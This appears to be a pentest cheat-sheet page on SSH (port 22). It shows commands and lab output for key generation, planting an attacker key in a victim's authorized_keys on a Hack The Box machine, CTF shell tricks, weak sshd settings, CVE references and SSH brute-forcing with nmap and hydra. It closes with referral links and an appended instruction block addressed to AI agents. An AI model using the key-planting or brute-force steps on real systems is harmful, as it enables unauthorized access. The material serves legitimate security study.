# SSH (22) [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Service ``` service ssh start #Verification netstat -antp | grep sshd ``` ## Keys ### SSH Connection ``` chmod 600 id_rsa ssh -i id_rsa user@host -p port ``` ### Generate Keys ``` 0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa. Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub. The key fingerprint is: SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell The key's randomart image is: +---[RSA 2048]----+ | .o. E=| | .. . + .o| | o o o + | | . o + . ....| | . S . + ++*| | = . = .o**| | O + o ++| | . B = = | | +.==.o | +----[SHA256]-----+ 0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh 0xSs0rZ@pico-2018-shell:~/.ssh$ 0xSs0rZ@pico-2018-shell:~/.ssh$ ls id_rsa id_rsa.pub 0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys 0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. picoCTF{quelquechose} ``` ### Authorized-Keys ``` # Atacker root@Host-001:~/Bureau/htb# cat traceback.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001 root@Host-001:~/Bureau/htb# # Victim webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys > authorized_keys webadmin@traceback:/home/webadmin/.ssh$ # Connection root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181 ``` ### Pseudo-Terminal ``` ssh -t bandit18@localhost /bin/sh ``` ## SSL Encryption ``` echo pass | openssl s_client -quiet -connect localhost:30001 ``` ## Generate key ```shell-session ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/parrot/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/parrot/.ssh/id_rsa Our public key has been saved in /home/parrot/.ssh/id_rsa.pub The key fingerprint is: SHA256:...SNIP... parrot@parrot The key's randomart image is: +---[RSA 3072]----+ | o.. | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | + +oo+o | +----[SHA256]-----+ ``` ## SSH with a key id\_rsa ``` [Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa [Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195 ``` ## Metasploit {% embed url="" %} ## Dangerous settings | **Setting** | **Description** | | ---------------------------- | ------------------------------------------- | | `PasswordAuthentication yes` | Allows password-based authentication. | | `PermitEmptyPasswords yes` | Allows the use of empty passwords. | | `PermitRootLogin yes` | Allows to log in as the root user. | | `Protocol 1` | Uses an outdated version of encryption. | | `X11Forwarding yes` | Allows X11 forwarding for GUI applications. | | `AllowTcpForwarding yes` | Allows forwarding of TCP ports. | | `PermitTunnel` | Allows tunneling. | | `DebianBanner yes` | Displays a specific banner when logging in. | ## CVE-2025-26465 The OpenSSH client contains a logic error between versions 6.8p1 to 9.9p1 (inclusive) that makes it vulnerable to an active MitM attack if the VerifyHostKeyDNS option is enabled {% embed url="" %} ``` nuclei -u yourHost.com -t template.yaml ``` ## CVE-2024-6387 - regreSSHion OpenSSH RCE {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## SSH Audit ```shell-session $ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit $ ./ssh-audit.py 10.129.14.132 ``` ## SSHumble ``` $ ./sshamble scan -o results.jsonl 192.168.0.0/24 $ ./sshamble analyze -o results-directory results.jsonl ``` {% embed url="" %} ## Change Authentication Method ```shell-session $ ssh -v cry0l1t3@10.129.14.132 OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config ...SNIP... debug1: Authentications that can continue: publickey,password,keyboard-interactive ``` For potential brute-force attacks, we can specify the authentication method with the SSH client option `PreferredAuthentications`. ```shell-session $ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config ...SNIP... debug1: Authentications that can continue: publickey,password,keyboard-interactive debug1: Next authentication method: password cry0l1t3@10.129.14.132's password: ``` ## Bruteforce {% content-ref url="/pages/JjwH2toJ8671TszdXENs" %} [SSH Bruteforce](/0xss0rz/pentest/brute-force/ssh-bruteforce.md) {% endcontent-ref %} ### **Nmap** ``` [Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT NSE: [ssh-brute] Trying username/password pair: root:root NSE: [ssh-brute] Trying username/password pair: admin:admin NSE: [ssh-brute] Trying username/password pair: administrator:administrator NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute] Trying username/password pair: guest:guest NSE: [ssh-brute] Trying username/password pair: user:user NSE: [ssh-brute] Trying username/password pair: web:web NSE: [ssh-brute] Trying username/password pair: test:test NSE: [ssh-brute] Trying username/password pair: root: NSE: [ssh-brute] Trying username/password pair: admin: NSE: [ssh-brute] Trying username/password pair: administrator: NSE: [ssh-brute] Trying username/password pair: webadmin: ``` ### **Hydra - See** [**Brute force - SSH**](/0xss0rz/pentest/brute-force/ssh-bruteforce.md) ```shell-session $ hydra -L user.list -P password.list ssh://10.129.42.197 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task [DATA] attacking ssh://10.129.42.197:22/ [22][ssh] host: 10.129.42.197 login: user password: password 1 of 1 target successfully completed, 1 valid password found ``` ## SSH on Windows Binaries: {% embed url="" %} Install SSH on Windows: {% embed url="" %} ## Execute command - Windows {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\ The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals. * [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\ A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network. * [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\ The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/ssh-22.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.